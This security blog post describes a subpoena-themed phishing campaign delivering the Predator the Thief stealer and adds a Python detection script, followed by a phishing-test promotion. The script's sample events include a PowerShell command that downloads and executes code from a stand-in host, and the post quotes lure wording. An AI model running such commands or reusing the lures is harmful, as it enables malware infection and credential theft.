
Subpoena phishing emails serve nasty Predator Thief infection


Phishers have been spotted delivering subpoena-themed emails spoofed to look as if they come from the UK Ministry of Justice, in an attempt to infect their targets with the Predator the Thief information stealer. This malspam campaign mainly targeted retail and insurance companies. Rather than attaching the malware directly, the attackers try to trick their potential victims into opening an embedded link that points to a redirection chain ending in a Word document with malicious macros.

A warning that the targets have to comply with the notice within two weeks is used in the phishing emails to add a sense of urgency that will entice the email readers to click on the link to find more information on why they have been “subpoenaed.”

Sample phishing email

“You have 14 days to provide notice. If you do not so prepare yourself, the court will take place without you,” the phishing email says.

This campaign’s operators also ask their potential victims to “prepare all necessary documents that are listed in the attached file” to maximise the user’s incentive to click the malicious link.

Once they click the link, the targets are sent through a multi-step redirection chain that is used to drop the final information stealer payload.

The link first opens a Google Docs document that contains a further link to a OneDrive resource, from which a Word document is downloaded. Both hops are on legitimate, widely trusted cloud services, which helps the links past URL-reputation filters. Cofense describes the Word document as being "used as a first stage downloader to execute a sample of Predator the Thief."

"The macro, upon execution, downloads the malware via PowerShell, which is a sample of the Predator the Thief information stealer," the Cofense researchers found.
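The step that gives defenders the clearest signal in this chain is a Word process spawning PowerShell to fetch a payload. The following is an added, hypothetical detection example, not code from Cofense or from the campaign itself: it scores process-creation events shaped like Sysmon Event ID 1 records (the field names ParentImage, Image and CommandLine, the sample events and the .invalid host names are all constructed for the example) by how closely they match an Office application launching a script host that downloads from the network.

```python
"""Flag the macro-to-PowerShell downloader step described above.

Added, hypothetical detection logic (not Cofense's and not the campaign's
code): it walks process-creation events shaped like Sysmon Event ID 1
records (ParentImage, Image, CommandLine; the field names are assumptions)
and rates each one by how closely it matches an Office document spawning
a script host that fetches a payload from the network.
"""
import re

# Office hosts that should almost never spawn a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Command-line fragments typical of a macro-driven downloader.
DOWNLOAD_PATTERNS = [
    re.compile(r"downloadstring|downloadfile", re.I),
    re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I),
    re.compile(r"start-bitstransfer|bitsadmin", re.I),
    # -e / -ec / -enc / -EncodedCommand followed by a base64 blob
    re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"https?://", re.I),
]


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> str:
    """Rate one process-creation event as high, medium, low or none."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    office_child = parent in OFFICE_PARENTS and image in SCRIPT_HOSTS
    download_hits = [p.pattern for p in DOWNLOAD_PATTERNS if p.search(cmdline)]
    if office_child and download_hits:
        return "high"    # Office -> script host -> network fetch: the chain in the article
    if office_child:
        return "medium"  # Office spawning a script host is rare enough to review on its own
    if image in SCRIPT_HOSTS and download_hits:
        return "low"     # scripted download, but not from an Office parent
    return "none"


def triage(events: list) -> dict:
    """Map EventId -> severity for every event that scores above 'none'."""
    return {e["EventId"]: score_event(e) for e in events if score_event(e) != "none"}


# Constructed sample events (not real telemetry); host names use .invalid.
SAMPLE_EVENTS = [
    {"EventId": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\user\Downloads\Subpoena.doc"'},
    {"EventId": 2,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://lure.invalid/stage2')\""},
    {"EventId": 3,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo hello"},
    {"EventId": 4,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest https://updates.invalid/x -OutFile x.exe"},
    {"EventId": 5,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"EventId": 6,
     "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for event_id, severity in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {severity}")
```

Treat this as one signal rather than a verdict: macros can break the direct parent-child link by launching PowerShell through WMI or a scheduled task, so pair the rule with network telemetry for the download itself, and keep the Office and script-host lists tuned to what is actually installed in the estate.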

Predator the Thief is a commercially sold information stealer, offered as a package containing a builder and a command-and-control (C2) panel; its developers also provide customer support via Telegram channels. After infecting a machine, the stealer harvests files from various folders, including documents and cryptocurrency wallet files (.dat and .wallet files for Ethereum, MultiBit, Electrum, Armory, Bytecoin and Bitcoin).

Cofense, who discovered the campaign, report that the malware also collects cookies from an extensive list of web browsers, including Chrome, Firefox and many lesser-known ones, account credentials for applications such as FileZilla, WinFTP, Steam and Discord, and screenshots. An extensive list of indicators of compromise (IOCs), including IP addresses and domains for the C2 servers and redirectors, as well as URLs for the documents used as lures in this campaign, is available via the second link.

With thanks to the Cyber Defence Alliance and BleepingComputer. The full story is here:

New-school Security Awareness Training can train your users to be on the alert for those kinds of “tells,” then test their reactions to simulated phishing emails based on actual phishes used by real malicious actors in the wild. It’s the best means to ensure that the only ones managing your teams are your own people — not confidence tricksters looking to muscle their way into your organisation’s network.

Free Phishing Security Test

Would your users fall for convincing phishing attacks? Take the first step now and find out before the bad guys do. Plus, see how you stack up against your peers with phishing Industry Benchmarks. The Phish-prone percentage is usually higher than you expect and is great ammo to get budget.


Here’s how it works:

Immediately start your test for up to 100 users (no need to talk to anyone)

Customise the phishing test template based on your environment

Choose the landing page your users see after they click

Show users which red flags they missed, or a 404 page

Get a PDF emailed to you in 24 hours with your Phish-prone % and charts to share with management

See how your organisation compares to others in your industry

